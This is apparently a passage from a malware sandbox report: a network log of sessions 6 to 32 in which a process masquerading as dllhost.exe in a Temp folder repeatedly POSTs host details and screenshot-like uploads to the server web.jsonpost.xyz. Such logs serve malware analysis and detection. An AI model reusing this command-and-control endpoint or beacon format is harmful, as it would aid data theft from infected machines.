6 | 192.168.2.4 | 49736 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:09.059854984 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: web.jsonpost.xyz
Content-Length: 82
Cache-Control: no-cache
Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49737 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:09.438774109 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
Host: web.jsonpost.xyz
Content-Length: 98005
Cache-Control: no-cache
Nov 29, 2024 01:52:09.438805103 CET | 156 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49738 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:10.344719887 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: web.jsonpost.xyz
Content-Length: 82
Cache-Control: no-cache
Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49739 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:10.590292931 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
Host: web.jsonpost.xyz
Content-Length: 98005
Cache-Control: no-cache
Nov 29, 2024 01:52:10.590323925 CET | 156 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                10 | 192.168.2.4 | 49740 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 29, 2024 01:52:11.828202009 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                11 | 192.168.2.4 | 49741 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 29, 2024 01:52:12.217291117 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:12.217314959 CET | 156 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                12 | 192.168.2.4 | 49743 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 29, 2024 01:52:13.217861891 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                13 | 192.168.2.4 | 49744 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 29, 2024 01:52:13.702984095 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:13.703012943 CET | 156 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                14 | 192.168.2.4 | 49746 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 29, 2024 01:52:14.650605917 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                15 | 192.168.2.4 | 49747 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 29, 2024 01:52:15.180883884 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:15.180951118 CET | 156 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                16 | 192.168.2.4 | 49748 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 29, 2024 01:52:16.064665079 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                17 | 192.168.2.4 | 49750 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 29, 2024 01:52:16.532196999 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:16.532391071 CET | 156 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                18 | 192.168.2.4 | 49752 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 29, 2024 01:52:17.586007118 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                19 | 192.168.2.4 | 49753 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 29, 2024 01:52:18.059998989 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----b9b9ff44e8c4fb7bf9d9e9a94afafff0
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 99446
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:18.060034037 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 62 39 62 39 66 66 34 34 65 38 63 34 66 62 37 62 66 39 64 39 65 39 61 39 34 61 66 61 66 66 66 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------b9b9ff44e8c4fb7bf9d9e9a94afafff0Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                20 | 192.168.2.4 | 49755 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 29, 2024 01:52:18.968494892 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                21 | 192.168.2.4 | 49756 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 29, 2024 01:52:19.807667017 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:19.807710886 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                22 | 192.168.2.4 | 49757 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 29, 2024 01:52:20.328190088 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                23 | 192.168.2.4 | 49759 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 29, 2024 01:52:21.314338923 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:21.314412117 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                24 | 192.168.2.4 | 49760 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 29, 2024 01:52:21.756469011 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                25 | 192.168.2.4 | 49761 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 29, 2024 01:52:22.842962980 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:22.843040943 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


Session ID: 26 | Source IP: 192.168.2.4 | Source Port: 49762 | Destination IP: 72.52.178.23 | Destination Port: 80 | PID: 7608 | Process: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp: Nov 29, 2024 01:52:23.233619928 CET | Bytes transferred: 235 | Direction: OUT | Data:
POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID: 27 | Source IP: 192.168.2.4 | Source Port: 49763 | Destination IP: 72.52.178.23 | Destination Port: 80 | PID: 7608 | Process: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp: Nov 29, 2024 01:52:24.368957043 CET | Bytes transferred: 195 | Direction: OUT | Data:
POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:24.368984938 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


Session ID: 28 | Source IP: 192.168.2.4 | Source Port: 49764 | Destination IP: 72.52.178.23 | Destination Port: 80 | PID: 7608 | Process: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp: Nov 29, 2024 01:52:24.654834032 CET | Bytes transferred: 235 | Direction: OUT | Data:
POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID: 29 | Source IP: 192.168.2.4 | Source Port: 49765 | Destination IP: 72.52.178.23 | Destination Port: 80 | PID: 7608 | Process: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp: Nov 29, 2024 01:52:25.906521082 CET | Bytes transferred: 195 | Direction: OUT | Data:
POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:25.906553030 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


Session ID: 30 | Source IP: 192.168.2.4 | Source Port: 49766 | Destination IP: 72.52.178.23 | Destination Port: 80 | PID: 7608 | Process: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp: Nov 29, 2024 01:52:26.062485933 CET | Bytes transferred: 235 | Direction: OUT | Data:
POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID: 31 | Source IP: 192.168.2.4 | Source Port: 49767 | Destination IP: 72.52.178.23 | Destination Port: 80 | PID: 7608 | Process: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp: Nov 29, 2024 01:52:27.484153032 CET | Bytes transferred: 235 | Direction: OUT | Data:
POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID: 32 | Source IP: 192.168.2.4 | Source Port: 49768 | Destination IP: 72.52.178.23 | Destination Port: 80 | PID: 7608 | Process: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp: Nov 29, 2024 01:52:27.529521942 CET | Bytes transferred: 195 | Direction: OUT | Data:
POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
